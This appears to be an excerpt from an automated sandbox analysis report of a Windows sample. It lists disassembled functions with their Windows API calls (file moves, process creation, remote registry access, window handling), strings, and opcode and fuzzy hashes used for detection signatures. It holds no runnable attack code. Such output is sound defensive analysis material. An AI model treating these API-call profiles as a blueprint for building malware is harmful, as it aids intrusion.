API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: eb95d07dc57a58be9c38951ea978904ca47e8682a06dae02d7b81d19945d4816
Instruction ID: e1c3fd726791063aaf4d6a519b36373e1f1c7b655e717a9f164d6e55fdda7748
Opcode Fuzzy Hash: eb95d07dc57a58be9c38951ea978904ca47e8682a06dae02d7b81d19945d4816
Instruction Fuzzy Hash: 43215375600219AF9B10AFACCC88DAB73ECEB0D761B408536FD15DB261E678EC458768

Function 004569F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004131DA

lstrcmpiW.KERNEL32(?,?), ref: 00456A2B
_wcscmp.LIBCMT ref: 00456A49
MoveFileW.KERNEL32(?,?), ref: 00456A62

Part of subcall function 00456D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00456DBA
Part of subcall function 00456D6D: GetLastError.KERNEL32 ref: 00456DC5
Part of subcall function 00456D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00456DD9

_wcscat.LIBCMT ref: 00456AA4
SHFileOperationW.SHELL32(?), ref: 00456B0C

Strings

\*.*, xrefs: 00456A9E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 2323102230-1173974218
Opcode ID: 262e403d32d090081f976dfde6123df6f064e7403f5e945b5f447fde96256345
Instruction ID: 25dcd62ce7493ecb50f0a674a47ae9febe6740c64dfeee0672fd954eb3734da4
Opcode Fuzzy Hash: 262e403d32d090081f976dfde6123df6f064e7403f5e945b5f447fde96256345
Instruction Fuzzy Hash: 54314771C002186ACF51EFA4E845BDEB7B89F08305F5054EBE905E3152DB349B89CF58

Function 004517C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045180D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00451833
SysAllocString.OLEAUT32(00000000), ref: 00451836
SysAllocString.OLEAUT32 ref: 00451857
SysFreeString.OLEAUT32 ref: 00451860
StringFromGUID2.COMBASE(?,?,00000028), ref: 0045187A
SysAllocString.OLEAUT32(?), ref: 00451888

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 29fa7a4cac29dbd2854492fa7576835f0773d715095932cf632e3a500528e6aa
Instruction ID: a40bcbe29420b6f40dd22ecbf1d5e79c581cd3d35db7a89842d7081e001e2e36
Opcode Fuzzy Hash: 29fa7a4cac29dbd2854492fa7576835f0773d715095932cf632e3a500528e6aa
Instruction Fuzzy Hash: A9214475600204AFDB10AFB9CC89DBA77ECEB1D360B408136F915DB261D674EC458769

Function 0047A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0042C657
Part of subcall function 0042C619: GetStockObject.GDI32(00000011), ref: 0042C66B
Part of subcall function 0042C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0042C675

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0047A13B
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0047A148
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0047A153
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0047A162
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0047A16E

Strings

Msctls_Progress32, xrefs: 0047A10C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 1fcdc65663fbfe6d71ba6404a06d5a1696139bf303a9f9504f95cab6b93daadf
Instruction ID: 19236e8467a4705e8e72e257f6d3fbb946d8b3c0915c01a36d9a5ff90a070759
Opcode Fuzzy Hash: 1fcdc65663fbfe6d71ba6404a06d5a1696139bf303a9f9504f95cab6b93daadf
Instruction Fuzzy Hash: 3B11B6B1140119BEFF115F61CC85EEB7F5DEF08798F018216FA08A6190C6769C21DBA4

Function 00434C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00434C3E

Part of subcall function 004386B5: GetLastError.KERNEL32(?,00430127,004388A3,00434673,?,?,00430127,?,0041125D,00000058,?,?), ref: 004386B7
Part of subcall function 004386B5: __calloc_crt.LIBCMT ref: 004386D8
Part of subcall function 004386B5: GetCurrentThreadId.KERNEL32 ref: 00438701
Part of subcall function 004386B5: SetLastError.KERNEL32(00000000,00430127,004388A3,00434673,?,?,00430127,?,0041125D,00000058,?,?), ref: 00438719

CloseHandle.KERNEL32(?,?,00434C1D), ref: 00434C52
__freeptd.LIBCMT ref: 00434C59
RtlExitUserThread.NTDLL(00000000,?,00434C1D), ref: 00434C61
GetLastError.KERNEL32(?,?,00434C1D), ref: 00434C91
RtlExitUserThread.NTDLL(00000000,?,?,00434C1D), ref: 00434C98
__freefls@4.LIBCMT ref: 00434CB4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 1445074172-0
Opcode ID: 0f2cce0352853327235aa0f14775053bda00d4caa9a48e276ffb2e63b2620494
Instruction ID: 9761c2d2f0d4c1e472b3990d86e4ef6110cb505b5483247ae90c51bf4ddec104
Opcode Fuzzy Hash: 0f2cce0352853327235aa0f14775053bda00d4caa9a48e276ffb2e63b2620494
Instruction Fuzzy Hash: C601D871801701AFC7187BB5D90994EB795FF5C319F10A52FF80887252DF3CE8418A59

Function 0047E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047E14D
_memset.LIBCMT ref: 0047E15C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004D3EE0,004D3F24), ref: 0047E18B
CloseHandle.KERNEL32 ref: 0047E19D

Strings

>M, xrefs: 0047E147
$?M, xrefs: 0047E156

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: $?M$>M
API String ID: 3277943733-3080949912
Opcode ID: 0524fc8104601550bda98030a5956e6abb962fe35b79c3fc3f0afadfbdf9ecb3
Instruction ID: fc4dee0abdaf5716d687f2c74acad45785fc13a2731d783aace8efd9d5783d2c
Opcode Fuzzy Hash: 0524fc8104601550bda98030a5956e6abb962fe35b79c3fc3f0afadfbdf9ecb3
Instruction Fuzzy Hash: 66F054F1941304BEE2105F65AC16F777B6DDB09355F004437BA04D51A1D7BA8E0086AD

Function 0042C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0042C6C0
GetWindowRect.USER32(?,?), ref: 0042C701
ScreenToClient.USER32(?,000000FF), ref: 0042C729
GetClientRect.USER32(?,?), ref: 0042C856
GetWindowRect.USER32(?,?), ref: 0042C86F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a8b36a6154701037899ea2d06a5556cbdcf4f7dea090e0c221697b1e2aed8a7c
Instruction ID: d9f94e8ab383e0608e434a5a83a0340c8e2b97c0af77552a30022b280731b73d
Opcode Fuzzy Hash: a8b36a6154701037899ea2d06a5556cbdcf4f7dea090e0c221697b1e2aed8a7c
Instruction Fuzzy Hash: BBB16B39A0024ADBCB10DFA9C4807EEB7B1FF48300F54952AED59AB350DB34A941CB59

Function 00459569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004596BC
_memmove.LIBCMT ref: 004595F7

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

_memmove.LIBCMT ref: 0045966A
_memmove.LIBCMT ref: 00459751
_memmove.LIBCMT ref: 0045976A
_memmove.LIBCMT ref: 00459786

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction ID: 4d35b6a040bf384c4486f052d75e19c90559cefe1dae49c581b85f2f34ba4fcd
Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction Fuzzy Hash: D5616F3050025A9BCB01EF61CC81EFE37A5AF48718F44455EFC5A6B292EB389D49CB59

Function 0042DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0042DCC0
_wcscat.LIBCMT ref: 0042DCC7
_wcscpy.LIBCMT ref: 00483CCB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction ID: c7a291735d0ba33d0aa01e53e4272548a8e27c5c9ed5fbd33c2a6d21f4258af8
Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction Fuzzy Hash: B9512371E04125AACB11AF9AE0409BEB7B0EF08714FD0804BF541AB291DBBC5F82D79D

Function 00472EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Part of subcall function 00473AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00472AA6,?,?), ref: 00473B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00472FA0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00472FE0
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00473003
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0047302C
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0047306F
RegCloseKey.ADVAPI32(00000000), ref: 0047307C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 85980c540d1f739a13b81986dca36ae50e634906aa59254a7ea892e3a9e5b899
Instruction ID: b2571739c5842409d7b12cf9e82b3452b1f51edb5f2bb854e6de47e380a8565a
Opcode Fuzzy Hash: 85980c540d1f739a13b81986dca36ae50e634906aa59254a7ea892e3a9e5b899
Instruction Fuzzy Hash: E6518C315082049FC700EF65C881EABB7F8FF88318F04892EF555872A1DB79EA45DB56

Function 00452ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00452AF6
VariantClear.OLEAUT32(00000013), ref: 00452B68
VariantClear.OLEAUT32(00000000), ref: 00452BC3
_memmove.LIBCMT ref: 00452BED
VariantClear.OLEAUT32(?), ref: 00452C3A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00452C68

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: af2601fc1b6e348cf318d7086031667809d9d0ef2c02419cd4ea4ee19b385490
Instruction ID: 17bc6471f9e1342b855995f15324aa4842ecdb5c4b88371b51b8126f76d867a7
Opcode Fuzzy Hash: af2601fc1b6e348cf318d7086031667809d9d0ef2c02419cd4ea4ee19b385490
Instruction Fuzzy Hash: 90516BB5A00209EFCB24CF58C880AAAB7B8FF4D314B15856AED49DB315D374E951CFA4

Function 004782DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 0047833D
GetMenuItemCount.USER32(00000000), ref: 00478374
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0047839C
GetMenuItemID.USER32(?,?), ref: 0047840B
GetSubMenu.USER32(?,?), ref: 00478419
PostMessageW.USER32(?,00000111,?,00000000), ref: 0047846A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 74a8fd25af3810193dd7cf09447cf2a7a2f83f8efd3fe563530b744a8153eeaf
Instruction ID: 35d7860e1a40d237cc5642293b0b322226b73f050734d7e467f82567a61f6a45
Opcode Fuzzy Hash: 74a8fd25af3810193dd7cf09447cf2a7a2f83f8efd3fe563530b744a8153eeaf
Instruction Fuzzy Hash: 9A519E71E00215AFCF00EF69C945AEEB7B4EF48714F10846EE819B7351DB78AE418B98

Function 004554E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045552E
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00455579
IsMenu.USER32(00000000), ref: 00455599
CreatePopupMenu.USER32 ref: 004555CD
GetMenuItemCount.USER32(000000FF), ref: 0045562B
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0045565C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: f8b4284ce3cf06d5399c46dd7d175fe887ada45e27d14607103aa117fd4ce4d1
Instruction ID: 9c8d8f145ae8e22144e6bf1f5c6060026187fd9649981e1ab7899766c6692651
Opcode Fuzzy Hash: f8b4284ce3cf06d5399c46dd7d175fe887ada45e27d14607103aa117fd4ce4d1
Instruction Fuzzy Hash: F551E870500689EFDF10CF68C898BBE7BF5AF1531AF50412BEC199B292D3789948CB59

Function 0042B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

BeginPaint.USER32(?,?,?,?,?,?), ref: 0042B1C1
GetWindowRect.USER32(?,?), ref: 0042B225
ScreenToClient.USER32(?,?), ref: 0042B242
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0042B253
EndPaint.USER32(?,?), ref: 0042B29D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 12c3a5cbe9f2cbe43f9a7d0cc8cf11732a98f240f276bee54e108b5f68c9f424
Instruction ID: eee9c138307a79408322a496f947f16e98c36d4d1d61d20223bc210b8752e126
Opcode Fuzzy Hash: 12c3a5cbe9f2cbe43f9a7d0cc8cf11732a98f240f276bee54e108b5f68c9f424
Instruction Fuzzy Hash: 9541B071600310AFC711EF15EC88F6A7BE8EB59324F04067AF995872A2C7349C45DBAA

Function 0047E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004D1810,00000000,?,?,004D1810,004D1810,?,0048E2D6), ref: 0047E21B
EnableWindow.USER32(?,00000000), ref: 0047E23F
ShowWindow.USER32(004D1810,00000000,?,?,004D1810,004D1810,?,0048E2D6), ref: 0047E29F
ShowWindow.USER32(?,00000004,?,?,004D1810,004D1810,?,0048E2D6), ref: 0047E2B1
EnableWindow.USER32(?,00000001), ref: 0047E2D5
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0047E2F8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 5d7feae2507e528fa60e4fb1ce156f557ab0e4ed9b6e0dad0d52da2313074d44
Instruction ID: 50e582652f62952856762c06598297b2124f0e68af93562fde46e06c8762529d
Opcode Fuzzy Hash: 5d7feae2507e528fa60e4fb1ce156f557ab0e4ed9b6e0dad0d52da2313074d44
Instruction Fuzzy Hash: A3413C34640141EFDB26CF19C499BD57BA5BB0A314F1882FAEA5C8F2A3C735AC41CB95

Function 0047E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0042B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042B5EB
Part of subcall function 0042B58B: SelectObject.GDI32(?,00000000), ref: 0042B5FA
Part of subcall function 0042B58B: BeginPath.GDI32(?), ref: 0042B611
Part of subcall function 0042B58B: SelectObject.GDI32(?,00000000), ref: 0042B63B

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0047E9F2
LineTo.GDI32(00000000,00000003,?), ref: 0047EA06
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0047EA14
LineTo.GDI32(00000000,00000000,?), ref: 0047EA24
EndPath.GDI32(00000000), ref: 0047EA34
StrokePath.GDI32(00000000), ref: 0047EA44

